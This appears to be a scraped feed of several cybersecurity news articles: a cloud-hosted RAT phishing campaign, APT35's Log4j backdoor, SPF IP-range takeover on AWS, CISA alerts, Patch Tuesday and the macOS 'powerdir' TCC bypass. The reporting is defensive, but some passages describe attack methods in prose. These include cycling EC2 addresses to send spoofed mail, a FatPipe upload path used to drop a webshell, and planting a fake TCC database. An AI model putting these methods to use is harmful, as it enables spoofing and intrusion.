Information Technology

A recent campaign leveraging public cloud infrastructure is deploying not one, but three commercial Remote Access Trojans (RATs).

Nanocore, Netwire, and AsyncRAT payloads are being deployed from public cloud systems in what Cisco Talos suggests is a way for cyberattackers to avoid having to own or manage their own private, paid infrastructure — such as through ‘bulletproof’ hosting which may eventually capture the interest of law enforcement. This abuse allows cybercriminals to leverage the resources of cloud services managed by vendors including Microsoft Azure and Amazon Web Services (AWS) for malicious purposes.  “These types of cloud services like Azure and AWS allow attackers to set up their infrastructure and connect to the internet with minimal time or monetary commitments,” Talos says. “It also makes it more difficult for defenders to track down the attackers’ operations.” On Wednesday, Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer said that a new campaign based on public cloud infrastructure was discovered in October 2021 and the majority of victims are based in the US, Canada, and Italy – however, a handful appear to be from Spain and South Korea.  The attack chain begins in a typical fashion: through a phishing email, often disguised as an invoice.  These messages have .ZIP files attached which, once opened, reveal an ISO image. The ISO file is equipped with a malicious loader for the Trojans through either JavaScript, a Windows batch file, or a Visual Basic script. 

If a victim attempts to load the disk image, these scripts will trigger. Designed to deploy Nanocore, Netwire, and AsyncRAT, the scripts will reach out to a download server to snag a payload — and this is where a public cloud service comes into play.  However, the downloader scripts use obfuscation techniques to hide these activities. The JavaScript contains four layers of obfuscation with each new, malicious process generated after the previous layer is peeled back; the batch file contains obfuscated commands that run PowerShell to pick up its payload, and the VBScript file also utilizes PowerShell commands. A PowerShell dropper built with HCrypt was also detected.  The attackers behind the campaign manage a variety of payload hosts, command-and-control (C2) servers, and malicious subdomains. The majority detected, so far, are hosted on Azure and AWS.    “Some of the download servers are running the Apache webserver application,” the researchers say. “The HTTP servers are configured to allow the listing of open directories that contain variants of NanocoreRATs, Netwire RAT, and AsyncRATs malware.” In addition, the operators abuse DuckDNS, a legitimate dynamic DNS service for pointing subdomains at IP addresses. The service is used to manage malware downloads via malicious DuckDNS subdomains and to mask the names of the C2 hosts, according to Talos.  Netwire, Nanocore, and AsyncRAT are popular commercial Trojan strains that are widely used by threat actors to remotely access and hijack vulnerable machines, steal user data, and conduct surveillance by means including audio and camera capture. “Defenders should monitor traffic to their organization and implement robust rules around the script execution policies on their endpoints,” the researchers commented. “It is even more important for organizations to improve email security to detect and mitigate malicious email messages and break the infection chain as early as possible.”
Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Iran-backed hacking group Phosphorous or APT35 is using the Log4j vulnerability to distribute a new modular PowerShell toolkit, according to security firm Check Point. APT35 is one of several state-backed hacking groups known to have been developing tools to exploit public-facing Java applications that use vulnerable versions of the Log4j error-logging component.

more Log4j

Microsoft, which tracks the group as Phosphorous and has called it out for increasingly using ransomware in attacks, found it had operationalized a Log4j exploit for future campaigns less than a week after Log4Shell’s December 9 disclosure. SEE: Log4j zero-day flaw: What you need to know and how to protect yourselfAccording to a further analysis by Check Point, APT35’s Log4j work was sloppy and “obviously rushed”, using a basic publicly available JNDI exploit kit (now removed from GitHub) for attacks that were easy to detect and attribute. After exploiting Log4j on public-facing systems, the group uses what Check Point describes it as ‘a PowerShell-based modular backdoor’ for persistence, communication with a command and control (C&C) server, and command execution for additional modules. The main module of the attacker’s PowerShell framework validates network connections, enumerates characteristics about a compromised system, retrieves the C&C domain from a hardcoded URL, and takes, decrypts and executes subsequent modules. After receiving information about compromised systems, the C&C server either issues no command or instructs the module to execute other modules that are written as PowerShell scripts or C# code. 

Back and forth communication between target and C&C runs continuously to determine what subsequent modules should be submitted to the target, according to Check Point. Each of the additional modules are responsible for encrypting data, exfiltration via the web or an FTP server, and sending execution logs to a remote server. But each module has unique capabilities, such as one for listing installed applications, another for taking screenshots, and more for listing running processes, enumeration, and executing predefined commands from the C&C. A final “cleanup module” is dropped at the end of collection activity that removes evidence, such as running processes created by previously used modules.”The modules sent by the C&C are executed by the main module, with each one reporting data back to the server separately,” explains Check Point. “This C&C cycle continues indefinitely, which allows the threat actors to gather data on the infected machine, run arbitrary commands and possibly escalate their actions by performing a lateral movement or executing follow-up malware such as ransomware.”On the quality of the group’s work, Check Point had few compliments because, unlike most advanced persistent threats, they don’t bother changing tools and infrastructure for new attacks and are known for making operational security (OpSec) blunders.”The group is famous in the cybersecurity community for the number of OpSec mistakes in their previous operations, and they tend not to put too much effort into changing their infrastructure once exposed,” Check Point notes. The firm says there are similar coding styles between the PowerShell scripts used for Log4Shell and the ones that the group used in Android spyware detailed by Google’s Threat Analysis Group in October. Despite the US Cybersecurity and Infrastructure Security Agency’s (CISA) confirmation it had seen no major breaches arise from Log4j exploitation, Microsoft assesses the Log4Shell issue as a “high-risk” situation because it’s difficult for organizations to know which applications, devices and services are affected. CISA also warned that attackers that have exploited Log4j may be waiting for alert levels to drop before using new but undetected footholds in targets.   More

Image: Can I Phish/Sebastian Salla
You’ve done the right thing by your organisation and made sure that DMARC and SPF (sender policy framework) records are set in an effort to reduce email spoofing, but all that good work could be undone if the SPF is too permissive in the stated IP range.

Such a situation was pointed out by Can I Phish CEO Sebastian Salla who scanned 1.8 million Australian domain records in search of email security snafus. The mistake Salla was looking for was within SPF records, which handles individual IP addresses, but also IP ranges. If an organisation had entered a wide IP range, and had their email infrastructure sitting on a cloud provider, which reuse IP addresses unless an organisation pays extra for a dedicated IP address, there could be scope to take over an address covered by someone else’s SPF record. Finding 60,000 IPs pointed towards various regions within Amazon Web Services (AWS), Salla was well on his way, and able to start EC2 instances on AWS that were handed an IP address that another organisation said it had control of. This happened 264 times. Among those caught out were Australian Parliament House, the University of Sydney, Mirvac, another major property investment group, and a state government organisation. “Each of the affected 264 organisations and their downstream customers are significantly more susceptible to business email compromise and phishing-related attacks. Anyone with a credit card can sign-up for an AWS account, cycle through EC2 instances until they get a desirable IP, request AWS to remove any SMTP restrictions and begin sending SPF authenticated emails as though they are any of these organisations,” Salla wrote. “When we consider the position that some of these organisations are in, we can better understand the impact. Imagine a parliamentary staffer receiving an email that appears to come from a Minister, or a student receiving an email posing as someone from university admissions and so on… The recipients in these cases have no technical mechanism to determine the real from fake.”

Salla told ZDNet that 69 of the organisations he found have yet to fix the issue, despite being given a 30-day remediation window and working with the Australian Cyber Security Centre (ACSC) on disclosure. While small organisations might have used wide IP ranges due to dynamic address allocation, Salla said large organisations have other considerations even though they can afford to reserve address blocks. “Due to the way AWS pricing works, if you reserve an IP address and then don’t use it, you get penalised and incur an hourly cost (this is due to the nature of there being limited IPs and AWS not wanted customers to reserve IPs excessively),” he said. “So I suspect, a business unit that focuses on cost optimisation in each org, is likely releasing unused IPs which mean people such as myself can come in and take them — ultimately leading to IP takeover attacks if this activity hasn’t been communicated between business units. “The ultimate fix is to only list IP addresses that are being actively used by mail servers — in the event that redundancy/disaster recovery are necessary, there are in-built capabilities within AWS that enable this, such as use of load-balancers or NAT gateways that only use a single IP.” See also: Phishing attacks are harder to spot on your smartphone. That’s why hackers are using them moreIn response to ZDNet, the ACSC pointed to the Australian government Information Security Manual as well as its advice on email security. “Organisations can reduce the likelihood of their domains being used to support fake emails by implementing Sender Policy Framework and Domain-based Message Authentication, Reporting and Conformance (DMARC) records in their Domain Name System configuration,” an ACSC spokesperson said. “DMARC is one of a variety of controls that, when used together, is a highly effective countermeasure for preventing phishing attacks where the attacker attempts to fully impersonate the sending email domain. “It is ultimately up to each agency to implement the advice of the Australian Cyber Security Centre, based on that agency’s assessment of the cyber threats it faces.” For its part, the Department of Parliamentary Services said it had fixed the issue. “The Department of Parliamentary Services resolved the issue of an incorrect SPF configuration for the vendor and this had no impact on the network,” it said. The University of Sydney, as is typical, said it took security seriously but would not comment on details of its cyber posture. “We do continually review and improve our systems to manage such threats, and can confirm the matters raised in the blog are not a current issue,” a spokesperson said. At the start of last month, Salla found a number of sites created by local web development company Precedence, which includes a Queensland council and federal member as customers, that had used a /16 address range, covering over a million IP addresses, in the SPF record used across its client base. The range was such that Salla said almost any EC2 instance started in Sydney’s ap-southeast-2 region would get an address covered by the range. “The first EC2 instance I spun up had an authorised IP address and I was able to send myself an SPF authenticated email from this particular city council which went straight into my inbox — passing all SPF and DMARC checks,” Salla wrote. Related Coverage More

The Cybersecurity and Infrastructure Security Agency (CISA) released an alert on Tuesday detailing a variety of tactics used by Russian state-sponsored groups to attack local and tribal governments across the US between September 2020 and December 2020. When pressed on why the guide was being released now and which local governments were attacked in 2020, CISA said it was part of their “continuing cybersecurity mission” with “interagency partners to warn organizations of potential criminal or nation state cyber threats.” 

ZDNet Recommends

The best security key

While robust passwords help you secure your valuable online accounts, hardware-based two-factor authentication takes that security to the next level.

Read More

“As described in the advisory, Russian state-sponsored actors have targeted a variety of US and international critical infrastructure organizations over the years. This guidance is being released to broadly share known tactics, techniques, and procedures, and encourage network defenders to take recommended actions,” a CISA spokesperson said. The alert said Russian state-sponsored advanced persistent threat (APT) actors have generally targeted US and international critical infrastructure organizations, but it also said the “high-profile cyber activity” revolved around the attacks on state, local, tribal, and territorial (SLTT) governments and aviation networks in the fall of 2020. CISA said the groups “targeted dozens of SLTT government and aviation networks” and were able to successfully compromise networks before exfiltrating data from an unknown number of victims.The US cybersecurity agency also said APT groups conducted “multi-stage intrusion” campaigns across multiple companies in the energy sector, deploying ICS-focused malware and collecting enterprise and ICS-related data from 2011 to 2018. 
CISA
The notice includes a range of advice for organizations as they try to protect themselves and their systems. CISA, the FBI, and the NSA also released a full list of vulnerabilities that Russian state-sponsored groups typically use to gain initial access to target networks.

Rick Holland, CISO at Digital Shadows, said these groups use “common but effective tactics,” relying on low-hanging fruit as well as sophisticated capabilities.”While it isn’t sexy, effective security hygiene like patching known vulnerabilities on external services raises the advisory costs and makes their job harder. Don’t be a soft target,” Holland said, noting the recent geopolitical issues embroiling the US-Russia relationship. The US is still in the process of recovering from the SolarWinds scandal, which saw Russian government groups gain widespread access to 100 government contractors and multiple agencies including the State Department, Department of Homeland Security, National Institutes of Health, the Pentagon, the Treasury Department, the Department of Commerce, the Department of Energy and the National Nuclear Security Administration.Rep. Carolyn Maloney, chairwoman of the House Committee on Oversight and Reform, held a hearing on Tuesday about efforts to strengthen the Federal Information Security Management Act (FISMA), which would force federal agencies to improve their cybersecurity standards.  Maloney noted that FISMA hasn’t been updated since 2014 and that federal agencies reported 30,819 cybersecurity incidents in 2020 alone.The CISA release also comes as the US and Russia spar over multiple issues in Ukraine and Kazakhstan. The alert cites previously reported attacks by Russian groups on critical infrastructure in Ukraine. A US Homeland Security report from 2016 said 225,000 customers were left without power two days before Christmas because of the Russian attack on three regional electric power distribution companies. CISA explained on Tuesday that the Russian groups involved in the attack used the BlackEnergy malware to steal user credentials, and then they used its malware component KillDisk to make infected computers inoperable. “In 2016, these actors conducted a cyber-intrusion campaign against a Ukrainian electrical transmission company and deployed CrashOverride malware specifically designed to attack power grids,” the CISA alert said. Chris Krebs, the former director of CISA, tweeted about the alert, saying, “State and NSC are in Geneva right now trying to keep the Russians out of Ukraine, but in case that doesn’t work, you might want to prepare for badness…” More

Microsoft has released 96 security fixes including updates to address six zero-day vulnerabilities.In the Redmond giant’s latest round of patches, usually released on the second Tuesday of each month in what is known as Patch Tuesday, Microsoft has fixed problems including remote code execution (RCE) exploits, privilege escalation flaws, spoofing issues, and cross-site scripting (XSS) vulnerabilities. 

Products impacted by January 2022’s security update include Microsoft Exchange Server, the Office software line, Windows Defender, Windows Kernel, RDP, Cryptographic Services, Windows Certificate, and Microsoft Teams.  The zero-day vulnerabilities resolved in this update are: CVE-2021-22947: HackerOne assigned CVE: An open source Curl RCE allowing for Man-in-The-Middle (MiTM) attacks.CVE-2021-36976: MITRE assigned CVE: An open source Libarchive use-after-free bug leading to RCE.CVE-2022-21874: A local Windows Security Center API RCE vulnerability (CVSS 7.8).CVE-2022-21919: A Windows User Profile Service Elevation of Privilege security issue (CVSS 7.0), PoC exploit code recorded.CVE-2022-21839: Windows Event Tracing Discretionary Access Control List Denial-of-Service (DoS) (CVSS 6.1).CVE-2022-21836: Windows Certificate spoofing, PoC code recorded (CVSS 7.8).None of the zero-day flaws above are known to have been exploited in the wild. A total of 24 vulnerabilities were patched earlier this month in Microsoft Edge (Chromium-based). According to the Zero Day Initiative (ZDI), this volume is unusual for the month of January, with previous years often being roughly half this number. Microsoft has also announced a refreshed Security Update Guide notification system, with standard email addresses now being accepted at signup rather than only Live IDs.Last month, Microsoft published 67 security fixes in the December 2021 Patch Tuesday. Seven critical vulnerabilities were among the issues patched, alongside six zero-day security flaws. One of the zero-days tackled was CVE-2021-43890, a bug in the Windows AppX Installer that is being actively exploited in the wild to spread Emotet, Trickbot, and Bazaloader malware.

A month prior, the tech giant tackled 55 vulnerabilities during the November 2021 Patch Tuesday.In recent Microsoft news, earlier this month the company published an emergency fix for a bug impacting on-premise Exchange Servers. A date-check failure glitch prevented mail to move smoothly through the transport queues of Exchange Server 2016 and Exchange Server 2019.Alongside Microsoft’s Patch Tuesday round, other vendors, too, will publish security updates which can be accessed below.Read on: More

This week, the Cybersecurity and Infrastructure Security Agency (CISA) added 15 vulnerabilities to its Known Exploited Vulnerabilities Catalog. Three of the vulnerabilities need to be remediated by federal civilian agencies before January 24, while the rest have remediation dates of July 10. 

ZDNet Recommends

CISA said the list is “based on evidence that threat actors are actively exploiting the vulnerabilities” and noted that the vulnerabilities are “a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.”The most urgent additions include a VMware vCenter Server Improper Access Control vulnerability, a Hikvision Improper Input Validation vulnerability and a FatPipe WARP, IPVPN, and MPVPN Privilege Escalation vulnerability. The rest of the list includes vulnerabilities involving Google Chrome, Microsoft Win32K, Microsoft WinVerify, Elastic Kibana, Primetek Primefaces, IBM WebSphere Application Server, Exim Mail Transfer Agent, Palo Alto Networks PAN-OS, Fortinet FortiOS and FortiProxy, Synacor Zimbra and Oracle WebLogic Server. The Known Exploited Vulnerabilities Catalog was created last year through a binding directive that allowed CISA to force federal civilian agencies to address certain vulnerabilities that are being used by cyberattackers. The first version of the list included 306 vulnerabilities commonly exploited during attacks but has grown since then.Joshua Aagard, a vulnerability analyst on the Photon Research Team at Digital Shadows, told ZDNet that CISA’s additions are wide-ranging and likely to come with knock-on effects for infrastructure. “Unauthorized actions and remote execution are cited many times as the consequence of successful exploitation. So are data input via sanitization and proper logical handling,” Aagard said. 

“Those I inspected also tend to share a common theme of centralized command or encompass a single point of failure. From an attacker’s perspective, a server console or critical proxy can serve as a Jenga block that brings down all the rest of the accompanying infrastructure.”The three that stood out most to him were the VMware vCenter Server Improper Access Control vulnerability, the Hikvision Improper Input Validation vulnerability and the FatPipe WARP, IPVPN, and MPVPN Privilege Escalation vulnerability. Aagard explained that the vulnerability in Hikvision CCTV cameras and camera systems relates to a lack of input validation, which leaves servers open to potentially malicious command injection attacks, otherwise known as RCE. “Full control of the target device can be had via nonrestricted shell at the root level, which even supersedes the designated owner level,” Aagard said. The FatPipe networks vulnerability affects their WARP, IPVPN, and MPVPN offerings and allows attackers to gain access to an unrestricted file upload function on the servlet at the URL path /fpui/uploadConfigServlet, which can then be used to drop a webshell/fpui/img/1,jsp for access to root and subsequent elevated privileges, according to Aagard. “Successful exploitation of this vulnerability could lead to pivot access with the internal network. Software versions prior to releases 10.1.2r60p93 and 10.2.2r44p1 are affected by this issue,” Aagard said. For the VMware vulnerability, a malicious actor with common network access to port 443 on vCenter Server could exploit this issue to perform a bypass and gain access to internal endpoints, Aagard explained. Netenrich principal threat hunter John Bambenek echoed Aagard’s concern about the VMWare vulnerability, noting that VMWare servers aren’t just one asset and are typically used to control many of the important assets in an organization. “This vulnerability provides a straightforward path to taking over a vCenter instance and all the assets therein,” Bambenek said. “Another observation is some of these vulnerabilities are quite old (one is from 2013). Why the federal government needs six more months to patch an 8-year-old vulnerability tells me all I need to know about how broken IT security is with the government.” More

There’s been a significant rise in distributed denial-of-service (DDoS) attacks accompanied by threats of extortion, with criminals demanding ransom payments in exchange for calling off an attack.DDoS attacks pose problems for organisations when attackers flood servers and online infrastructure which requests for access, slowing down services or taking them fully offline, thus preventing legitimate users from accessing services at all – and cutting off business for the affected organisation.While they’re not an especially advanced form of cyber attack, DDoS attacks still prove to be effective and cybersecurity researchers at Cloudflare have warned that some of the cyber criminals behind DDoS campaigns are becoming more prolific and more aggressive.This includes large rise in the number of ransom DDoS attacks – when cyber criminals demand a ransom to stop a DDoS attack or to not conduct one in the first place. According to Cloudflare, ransom DDoS attacks increased by almost a third year-on-year between 2020 and 2021 and jumped  by 175% in the final quarter of 2021 compared to the previous three months. This included large-scale ransom DDoS attacks on voice over IP (VoIP) service providers. SEE: A winning strategy for cybersecurity (ZDNet special report) According to a survey by Cloudflare, just over one in five DDoS attacks was accompanied by a ransom note from the attacker during 2021. In December – a prime time for online retailers in the run up to Christmas, one in three of the organisations surveyed said they’ve received a ransom letter relating to a DDoS attack.

Targets on the receiving end of DDoS attacks can commonly include online retailers, online local governments, cloud-based business applications, streaming services and online games.”Over the years, it has become increasingly easier for attackers to launch DDoS attacks,” researchers warned in the blog post.There are number of steps organisations can take to avoid disruption as a result of DDoS attacks; these include using cloud-based hosting providers, deploying IP stresser services to test bandwidth capabilities and employing a DDoS mitigation service.MORE ON CYBERSECURITY More

Microsoft has detailed how malware on macOS can bypass privacy preferences enforced by Apple’s macOS system called Transparency, Consent, and Control (TCC) for controlling apps’ access to sensitive user data. The ‘powerdir’ bug, which Apple fixed in its December 13 update for macOS up to Monterey, lets an attacker bypass TCC to gain access to a user’s protected data. 

The bug was discovered by Microsoft security researcher Jonathan Bar Or. Microsoft is interested in macOS security because Defender for Endpoint can be used in an enterprise to protect non-Windows devices.Microsoft’s 365 Defender Research Team noted in a blog post that Apple introduced a feature to protect TCC that “prevents unauthorized code execution and enforced a policy that restricts access to TCC to only apps with full disk access.”However, Or discovered that it is “possible to programmatically change a target user’s home directory and plant a fake TCC database, which stores the consent history of app requests.””If exploited on unpatched systems, this vulnerability could allow a malicious actor to potentially orchestrate an attack based on the user’s protected personal data,” Microsoft said. An attacker could hijack an already installed app or install their own malicious app to access the microphone to record private conversations or capture screenshots of sensitive information displayed on the user’s screen, Microsoft explained. 

TCC appeared in 2012 in OS X Mountain Lion and is behind the system notifications users see when giving or denying ‘consent’ for specific applications to access private data, which includes access to the device’s camera, microphone, location, and access to the user’s calendar or iCloud account. Apple doesn’t detail TCC directly in its security manual, however, via security firm Sentinal One, TCC’s purpose is described in a section of the manual detailing how macOS and iOS protect app access to user data. Users can manage these privacy protections in macOS within the Security & Privacy section of System Preferences.”Apple devices help prevent apps from accessing a user’s personal information without permission using various technologies including Data Vault. In Settings in iOS and iPadOS, or System Preferences in macOS, users can see which apps they have permitted to access certain information as well as grant or revoke any future access,” Apple explains. Microsoft’s TCC bypass flaw offers a new way to bypass protections Apple has added to previously discovered TCC bypasses, including CVE-2020-9771, CVE-2020-9934, and CVE-2021-30713. To protect TCC from these bypass flaws, Apple introduced a feature that prevents unauthorized code execution and enforced a policy that restricts access to TCC to only apps with full disk access. Those fixes protected TCC.db (database) files from being incorrectly accessed through, for example. Time Machine backups or alternative file paths.  Microsoft bypass Apple’s TCC protections worked by planting a fake TCC.db file and changing the Home directory using a specific ‘superuser’ sudo command in the Directory Services command-line utility.”While requiring root access, we discovered that this works only if the app is granted with the TCC policy kTCCServiceSystemPolicySysAdminFiles, which the local or user-specific TCC.db maintains,” explains Microsoft.  “That is weaker than having full disk access, but we managed to bypass that restriction with the dsexport and dsimport utilities.”Microsoft’s proof of concept demonstrated that attackers could change the settings on any application, potentially allowing them to enable microphone and camera access on any app — hence the bug’s name “Powerdir”.  More